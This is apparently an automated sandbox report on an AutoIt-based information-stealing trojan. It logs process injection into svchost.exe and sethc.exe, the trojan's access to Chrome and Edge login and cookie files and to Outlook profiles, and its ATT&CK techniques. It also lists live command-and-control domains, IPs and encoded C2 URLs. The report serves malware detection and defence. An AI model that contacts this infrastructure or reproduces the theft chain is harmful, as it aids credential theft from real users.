                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\sethc.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\sethc.exe | Section loaded: NULL target: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe protection: read write
                Source: C:\Windows\SysWOW64\sethc.exe | Section loaded: NULL target: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\sethc.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\sethc.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\sethc.exe | Thread register set: target process: 6920
                Source: C:\Windows\SysWOW64\sethc.exe | Thread APC queued: target process: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 6F8008
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exe | Code function: 0_2_0052B106 LogonUserW | 0_2_0052B106
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exe | Code function: 0_2_004F3D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW | 0_2_004F3D19
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exe | Code function: 0_2_0053411C SendInput,keybd_event | 0_2_0053411C
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exe | Code function: 0_2_005374E7 mouse_event | 0_2_005374E7
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\ek8LkB2Cgo.exe"
                Source: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe | Process created: C:\Windows\SysWOW64\sethc.exe "C:\Windows\SysWOW64\sethc.exe"
                Source: C:\Windows\SysWOW64\sethc.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exe | Code function: 0_2_0052A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity | 0_2_0052A66C
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exe | Code function: 0_2_005371FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid | 0_2_005371FA
                Source: ek8LkB2Cgo.exe, RlKZsaoEJNpD.exe, 00000005.00000002.3777859704.0000000001970000.00000002.00000001.00040000.00000000.sdmp, RlKZsaoEJNpD.exe, 00000005.00000000.1469313265.0000000001971000.00000002.00000001.00040000.00000000.sdmp, RlKZsaoEJNpD.exe, 00000007.00000002.3777694135.0000000001850000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
                Source: RlKZsaoEJNpD.exe, 00000005.00000002.3777859704.0000000001970000.00000002.00000001.00040000.00000000.sdmp, RlKZsaoEJNpD.exe, 00000005.00000000.1469313265.0000000001971000.00000002.00000001.00040000.00000000.sdmp, RlKZsaoEJNpD.exe, 00000007.00000002.3777694135.0000000001850000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
                Source: RlKZsaoEJNpD.exe, 00000005.00000002.3777859704.0000000001970000.00000002.00000001.00040000.00000000.sdmp, RlKZsaoEJNpD.exe, 00000005.00000000.1469313265.0000000001971000.00000002.00000001.00040000.00000000.sdmp, RlKZsaoEJNpD.exe, 00000007.00000002.3777694135.0000000001850000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: ?Program Manager
                Source: ek8LkB2Cgo.exe | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
                Source: RlKZsaoEJNpD.exe, 00000005.00000002.3777859704.0000000001970000.00000002.00000001.00040000.00000000.sdmp, RlKZsaoEJNpD.exe, 00000005.00000000.1469313265.0000000001971000.00000002.00000001.00040000.00000000.sdmp, RlKZsaoEJNpD.exe, 00000007.00000002.3777694135.0000000001850000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exe | Code function: 0_2_005165C4 cpuid | 0_2_005165C4
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exe | Code function: 0_2_0054091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW | 0_2_0054091D
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exe | Code function: 0_2_0056B340 GetUserNameW | 0_2_0056B340
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exe | Code function: 0_2_00521E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte | 0_2_00521E8E
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exe | Code function: 0_2_0050DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo | 0_2_0050DDC0

                Stealing of Sensitive Information

                Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000006.00000002.3778150312.00000000049B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.3778103471.0000000004960000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.1542930105.00000000030D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.3780336358.0000000005610000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.3771923815.0000000000C80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.1542601983.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.3778462020.00000000030B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.1543326979.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\sethc.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\sethc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\sethc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\sethc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\sethc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\sethc.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\sethc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\sethc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\sethc.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
                Source: ek8LkB2Cgo.exe | Binary or memory string: WIN_81
                Source: ek8LkB2Cgo.exe | Binary or memory string: WIN_XP
                Source: ek8LkB2Cgo.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
                Source: ek8LkB2Cgo.exe | Binary or memory string: WIN_XPe
                Source: ek8LkB2Cgo.exe | Binary or memory string: WIN_VISTA
                Source: ek8LkB2Cgo.exe | Binary or memory string: WIN_7
                Source: ek8LkB2Cgo.exe | Binary or memory string: WIN_8

                Remote Access Functionality

                Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000006.00000002.3778150312.00000000049B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.3778103471.0000000004960000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.1542930105.00000000030D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.3780336358.0000000005610000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.3771923815.0000000000C80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.1542601983.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.3778462020.00000000030B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.1543326979.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exe | Code function: 0_2_00548C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket | 0_2_00548C4F
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exe | Code function: 0_2_0054923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket | 0_2_0054923B
                MITRE ATT&CK Matrix

                The matrix was flattened by extraction; it is given here one tactic per line, techniques in the original row order, with the count the report shows next to an observed technique in parentheses.

                Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
                Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
                Initial Access: Valid Accounts (2); Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
                Execution: Native API (3); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
                Persistence: DLL Side-Loading (1); Valid Accounts (2); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
                Privilege Escalation: Exploitation for Privilege Escalation (1); Abuse Elevation Control Mechanism (1); DLL Side-Loading (1); Valid Accounts (2); Access Token Manipulation (21); Process Injection (412); Startup Items; Scheduled Task/Job; At
                Defense Evasion: Disable or Modify Tools (1); Deobfuscate/Decode Files or Information (1); Abuse Elevation Control Mechanism (1); Obfuscated Files or Information (3); DLL Side-Loading (1); Valid Accounts (2); Virtualization/Sandbox Evasion (2); Access Token Manipulation (21); Process Injection (412)
                Credential Access: OS Credential Dumping (1); Input Capture (11); Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
                Discovery: System Time Discovery (2); Account Discovery (1); File and Directory Discovery (2); System Information Discovery (116); Security Software Discovery (151); Virtualization/Sandbox Evasion (2); Process Discovery (3); Application Window Discovery (11); System Owner/User Discovery (1)
                Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
                Collection: Archive Collected Data (1); Data from Local System (1); Email Collection (1); Input Capture (11); Clipboard Data (3); GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
                Command and Control: Ingress Tool Transfer (4); Encrypted Channel (1); Non-Application Layer Protocol (4); Application Layer Protocol (4); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
                Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
                Impact: System Shutdown/Reboot (1); Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
                Behavior Graph (ID: 1568372; the rendered graph did not survive extraction, the node and edge information it carried is listed below)

                Sample: ek8LkB2Cgo.exe; Start date: 04/12/2024; Architecture: WINDOWS; Score: 100
                Start node: DNS/IP contacts www.soainsaat.xyz, www.futurorks.xyz and 16 other IPs or domains; signatures: Suricata IDS alerts for network traffic; Antivirus detection for URL or domain; Multi AV Scanner detection for submitted file; 4 other signatures. www.futurorks.xyz: Performs DNS queries to domains with low reputation.
                ek8LkB2Cgo.exe (started): Binary is likely a compiled AutoIt script file; Writes to foreign memory regions; Maps a DLL or memory area into another process; Switches to a custom stack to bypass stack traces
                  -> svchost.exe (started by ek8LkB2Cgo.exe): Maps a DLL or memory area into another process
                    -> RlKZsaoEJNpD.exe (injected by svchost.exe): Found direct / indirect Syscall (likely to bypass EDR)
                      -> sethc.exe (started by RlKZsaoEJNpD.exe): Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
                        -> RlKZsaoEJNpD.exe (injected by sethc.exe): Found direct / indirect Syscall (likely to bypass EDR); network: www.futurorks.xyz 203.161.43.228 ports 49997, 49998, 49999 (VNPT-AS-VNVNPTCorpVN Malaysia); www.327531.buzz 43.199.54.158 ports 49907, 49913, 49918 (LILLY-ASUS Japan); 11 other IPs or domains
                        -> firefox.exe (started by sethc.exe)

                Antivirus, Machine Learning and Genetic Malware Detection

                Source | Detection | Scanner | Label | Link
                ek8LkB2Cgo.exe | 74% | ReversingLabs | Win32.Trojan.AutoitInject
                ek8LkB2Cgo.exe | 100% | Joe Sandbox ML
                No Antivirus matches

                URLs

                Source | Detection | Scanner | Label | Link
                http://www.soainsaat.xyz/912o/0%Avira URL Cloudsafe
                http://www.nicolemichelle.net/4vk9/0%Avira URL Cloudsafe
                http://www.hwbzfdtn.tokyo/3pje/0%Avira URL Cloudsafe
                http://www.vayui.top/t4v0/?GhEtuH=BaKEDIuCqsvR37Bn6+TgiJMwkxJzDUIqAYq0m1TFifk8gDAIMlekNhph8Tar9Z0dtwi6g0hFX56VxC4Q/su0r8fyWQFgq8KpC42yk6uDr99A+ZghhUp+L9tXlGYeR9GDO3Mz2SBmPslm&9hy=gvrDS8U8OP0%Avira URL Cloudsafe
                http://www.remedies.pro/4azw/0%Avira URL Cloudsafe
                http://www.duwixushx.xyz/fyc8/?GhEtuH=9quk7MnvWgGB/+oSKiWFDzYoPJYT6eA3ueh2PF/6PpTLuIpSuGh5poP5vhKU1hzLJrxVAWnbk59J+ABTrLnIqcNR2VABk2apNjRDHz4+NFXCe5SYECaGO4YN/+FCU+q/RL6A2UBNebQ0&9hy=gvrDS8U8OP100%Avira URL Cloudmalware
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.remedies.pro | 13.248.169.48 | true | true | | unknown
www.vayui.top | 172.67.145.234 | true | false | | high
domains-38.cribflyer.com | 54.176.168.58 | true | true | | unknown
www.aextligrwjv.best | 172.67.185.6 | true | true | | unknown
www.duwixushx.xyz | 156.251.17.224 | true | false | | high
benteng01.cn | 8.223.59.213 | true | true | | unknown
natroredirect.natrocdn.com | 85.159.66.93 | true | false | | high
www.3kw40881107247y.click | 172.67.192.207 | true | true | | unknown
zhs.zohosites.com | 136.143.186.12 | true | false | | high
www.nicolemichelle.net | 38.63.190.200 | true | false | | unknown
www.futurorks.xyz | 203.161.43.228 | true | true | | unknown
www.327531.buzz | 43.199.54.158 | true | true | | unknown
www.dating-ml-es.xyz | 199.59.243.227 | true | true | | unknown
www.hwbzfdtn.tokyo | unknown | unknown | false | | unknown
www.129glenforest.com | unknown | unknown | false | | unknown
www.soainsaat.xyz | unknown | unknown | true | | unknown
www.everythlngict.org | unknown | unknown | false | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
13.248.169.48 | www.remedies.pro | United States | 16509 | AMAZON-02US | true
136.143.186.12 | zhs.zohosites.com | United States | 2639 | ZOHO-ASUS | false
172.67.185.6 | www.aextligrwjv.best | United States | 13335 | CLOUDFLARENETUS | true
199.59.243.227 | www.dating-ml-es.xyz | United States | 395082 | BODIS-NJUS | true
85.159.66.93 | natroredirect.natrocdn.com | Turkey | 34619 | CIZGITR | false
38.63.190.200 | www.nicolemichelle.net | United States | 174 | COGENT-174US | false
203.161.43.228 | www.futurorks.xyz | Malaysia | 45899 | VNPT-AS-VNVNPTCorpVN | true
156.251.17.224 | www.duwixushx.xyz | Seychelles | 132839 | POWERLINE-AS-APPOWERLINEDATACENTERHK | false
172.67.192.207 | www.3kw40881107247y.click | United States | 13335 | CLOUDFLARENETUS | true
54.176.168.58 | domains-38.cribflyer.com | United States | 16509 | AMAZON-02US | true
8.223.59.213 | benteng01.cn | Singapore | 45102 | CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | true
172.67.145.234 | www.vayui.top | United States | 13335 | CLOUDFLARENETUS | false
43.199.54.158 | www.327531.buzz | Japan | 4249 | LILLY-ASUS | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1568372
Start date and time: 2024-12-04 15:29:43 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 11m 0s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 12
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: ek8LkB2Cgo.exe (renamed because the original name is a hash value)
Original Sample Name: 00852cad9ef3c816fa777f405bda3d30a62fbaed64a2489ce859b30734705959.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/3@15/13
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 91%
• Number of executed functions: 49
• Number of non-executed functions: 299
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded the maximum time and may be missing disassembly code information
• Report size exceeded the maximum capacity and may be missing disassembly code
• VT rate limit hit for: ek8LkB2Cgo.exe
Time | Type | Description
10:41:26 | API Interceptor | 9854216x Sleep call for process: sethc.exe modified
                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                13.248.169.48Document_084462.scr.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                • www.optimismbank.xyz/98j3/?2O=jo1iJOnj8ueGZPJDfvyWmhhX4bGAJjt1DdtSaCSQL5v3UEYBE5VATgnqgu9yCYXU1qT81UG2HbOLQLBbZNDoJaqiWagLaQ4MrpZVJnF4w7w/HKU2baOdEb4=&ChhG6=J-xs
                                                                                Pp7OXMFwqhXKx5Y.exeGet hashmaliciousFormBookBrowse
                                                                                • www.smartgov.shop/1cwp/
                                                                                SW_5724.exeGet hashmaliciousFormBookBrowse
                                                                                • www.egyshare.xyz/440l/
                                                                                attached invoice.exeGet hashmaliciousFormBookBrowse
                                                                                • www.aktmarket.xyz/wb7v/
                                                                                YH-3-12-2024-GDL Units - Projects.exeGet hashmaliciousFormBookBrowse
                                                                                • www.tals.xyz/k1td/
 | Proforma invoice - Arancia NZ.exe | malicious | FormBook | www.optimismbank.xyz/98j3/
 | lKvXJ7VVCK.exe | malicious | FormBook | www.avalanchefi.xyz/ctta/
 | BASF Hung#U00e1ria Kft.exe | malicious | FormBook | www.tals.xyz/k1td/
 | PAYMENT_ADVICE.exe | malicious | FormBook | www.heliopsis.xyz/69zn/
 | 1k24tbb-00241346.exe | malicious | FormBook, PureLog Stealer | www.gupiao.bet/t3a1/
136.143.186.12 | r6lOHDg9N9.exe | malicious | FormBook | www.lanxuanz.tech/tpid/
136.143.186.12 | Purchase_Order_pdf.exe | malicious | FormBook | www.lanxuanz.tech/1q08/
136.143.186.12 | jeez.exe | malicious | FormBook | www.lanxuanz.tech/m8yb/
136.143.186.12 | PURCHASE ORDER.exe | malicious | FormBook | www.lanxuanz.tech/ivo1/
136.143.186.12 | z4Shipping_document_pdf.exe | malicious | FormBook | www.lanxuanz.tech/1q08/
136.143.186.12 | NVOICE FOR THE MONTH OF AUG-24.exe | malicious | FormBook | www.lanxuanz.tech/ivo1/
136.143.186.12 | DEBIT NOTE 01ST SEP 2024.exe | malicious | FormBook | www.lanxuanz.tech/ivo1/
136.143.186.12 | PROFOMA INVOICE SHEET.exe | malicious | FormBook | www.lanxuanz.tech/ivo1/
136.143.186.12 | x.exe | malicious | FormBook | www.lanxuanz.tech/em49/
136.143.186.12 | bin.exe | malicious | FormBook | www.lanxuanz.tech/em49/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
www.remedies.pro | SW_5724.exe | malicious | FormBook | 13.248.169.48
www.remedies.pro | CV_ Filipa Barbosa.exe | malicious | FormBook | 13.248.169.48
www.remedies.pro | CV_ Filipa Barbosa.exe | malicious | FormBook | 13.248.169.48
natroredirect.natrocdn.com | PO 4110007694.exe | malicious | FormBook | 85.159.66.93
natroredirect.natrocdn.com | Latest advice payment.exe | malicious | FormBook | 85.159.66.93
natroredirect.natrocdn.com | New Order.exe | malicious | FormBook | 85.159.66.93
natroredirect.natrocdn.com | specification and drawing.exe | malicious | FormBook, PureLog Stealer | 85.159.66.93
natroredirect.natrocdn.com | CCE 30411252024.exe | malicious | FormBook | 85.159.66.93
natroredirect.natrocdn.com | OUTSTANDING BALANCE PAYMENT.exe | malicious | FormBook | 85.159.66.93
natroredirect.natrocdn.com | TNT Express Delivery Consignment AWD 87993766479.vbs | malicious | FormBook | 85.159.66.93
natroredirect.natrocdn.com | OUTSTANDING BALANCE PAYMENT.exe | malicious | FormBook | 85.159.66.93
natroredirect.natrocdn.com | REQUESTING FOR UPDATED SOA.exe | malicious | FormBook | 85.159.66.93
natroredirect.natrocdn.com | Certificate 11-18720.exe | malicious | FormBook | 85.159.66.93
www.vayui.top | PO 4110007694.exe | malicious | FormBook | 104.21.95.160
www.vayui.top | Latest advice payment.exe | malicious | FormBook | 172.67.145.234
www.vayui.top | ZAMOWIEN.BAT.exe | malicious | FormBook, GuLoader | 172.67.145.234
www.vayui.top | OUTSTANDING BALANCE PAYMENT.exe | malicious | FormBook | 104.21.95.160
www.vayui.top | OUTSTANDING BALANCE PAYMENT.exe | malicious | FormBook | 172.67.145.234
www.vayui.top | ZAMOWIEN.BAT.exe | malicious | FormBook, GuLoader | 172.67.145.234
www.vayui.top | S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | malicious | FormBook, GuLoader | 104.21.95.160
www.vayui.top | purchase Order.exe | malicious | FormBook | 172.67.145.234
www.vayui.top | RFQ 3100185 MAHAD.exe | malicious | FormBook | 172.67.145.234
domains-38.cribflyer.com | Item-RQF-9456786.exe | malicious | Unknown | 50.18.131.220
www.duwixushx.xyz | PO 4110007694.exe | malicious | FormBook | 156.251.17.224
www.duwixushx.xyz | PO_1111101161.vbs | malicious | FormBook | 156.251.17.224
www.duwixushx.xyz | OUTSTANDING BALANCE PAYMENT.exe | malicious | FormBook | 156.251.17.224
www.duwixushx.xyz | DOC_114542366.vbe | malicious | FormBook | 156.251.17.224
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | Welcome To Raise.eml | malicious | Unknown | 1.1.1.1
CLOUDFLARENETUS | Teklif Talebi #U0130hale No_14991_PDF.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 172.67.177.134
CLOUDFLARENETUS | Ziraat Bankasi Swift Mesaji.pdf.exe | malicious | MassLogger RAT | 104.21.67.152
CLOUDFLARENETUS | rukT6hBo6P.exe | malicious | Phemedrone Stealer | 172.67.70.233
CLOUDFLARENETUS | https://bdb142c8309e44b2310105b0e00240d6.surge.sh/ | malicious | Unknown | 104.21.57.195
CLOUDFLARENETUS | https://indiollanero7nudos.com | malicious | Unknown | 172.67.191.200
CLOUDFLARENETUS | JjUCGUKdtX.exe | malicious | Unknown | 104.21.27.3
CLOUDFLARENETUS | gCK3ozTL7Q.ps1 | malicious | Phemedrone Stealer | 172.67.70.233
CLOUDFLARENETUS | Activation.exe | malicious | Phemedrone Stealer | 104.26.1.100
CLOUDFLARENETUS | T05Dk6G8fg.exe | malicious | Unknown | 104.16.184.241
AMAZON-02US | Welcome To Raise.eml | malicious | Unknown | 18.134.234.85
AMAZON-02US | https://bdb142c8309e44b2310105b0e00240d6.surge.sh/ | malicious | Unknown | 52.211.89.170
AMAZON-02US | Recent Services Delays Update.pdf | malicious | KnowBe4, PDFPhish | 13.227.8.37
AMAZON-02US | RzLnOTy9k3.lnk | malicious | LummaC Stealer | 52.218.232.113
AMAZON-02US | main_x86.elf | malicious | Mirai | 54.171.230.55
AMAZON-02US | http://redr.me | malicious | Unknown | 13.227.8.8
AMAZON-02US | Document.xla.xlsx | malicious | FormBook, HTMLPhisher | 54.150.207.131
AMAZON-02US | main_arm7.elf | malicious | Mirai | 54.247.62.1
AMAZON-02US | mpsl.elf | malicious | Unknown | 54.171.230.55
AMAZON-02US | Amoxycillin Trihydrate Powder.docx.doc | malicious | Remcos | 54.150.207.131
BODIS-NJUS | bestimylover.hta | malicious | Cobalt Strike, FormBook, HTMLPhisher | 199.59.243.227
BODIS-NJUS | http://divisioninfo.net/ | malicious | Unknown | 199.59.243.205
BODIS-NJUS | SW_5724.exe | malicious | FormBook | 199.59.243.227
BODIS-NJUS | Ziraat_Swift.hta | malicious | MassLogger RAT, PureLog Stealer | 199.59.243.227
BODIS-NJUS | 1k24tbb-00241346.exe | malicious | FormBook, PureLog Stealer | 199.59.243.227
BODIS-NJUS | CV_ Filipa Barbosa.exe | malicious | FormBook | 199.59.243.227
BODIS-NJUS | W3MzrFzSF0.exe | malicious | FormBook, PureLog Stealer | 199.59.243.227
BODIS-NJUS | FATURA.exe | malicious | FormBook | 199.59.243.227
BODIS-NJUS | Quotation sheet.exe | malicious | FormBook, PureLog Stealer | 199.59.243.227
BODIS-NJUS | file.exe | malicious | FormBook, PureLog Stealer | 199.59.243.227
ZOHO-ASUS | https://www.manageuser.com/products/oputils/83624731/Manageuser_OpUtils_64bit.exe | malicious | Unknown | 136.143.186.18
ZOHO-ASUS | https://lapxae.clicks.mlsend.com/tf/c/eyJ2Ijoie1wiYVwiOjEyMDgyNzAsXCJsXCI6MTM5MTY5OTI3NzkzNzM5NDQ1LFwiclwiOjEzOTE2OTkzOTkzNjI0OTU2NH0iLCJzIjoiZjE4YTc4MTcwZGM2NmU1MSJ9 | malicious | Unknown | 136.143.182.97
ZOHO-ASUS | https://zfrmz.com/T43PlTPOxp2IyD9DoPOm | malicious | Unknown | 204.141.33.178
ZOHO-ASUS | https://zfrmz.com/mH78Gmbnl9SICcogz2hN | malicious | HTMLPhisher | 136.143.183.178
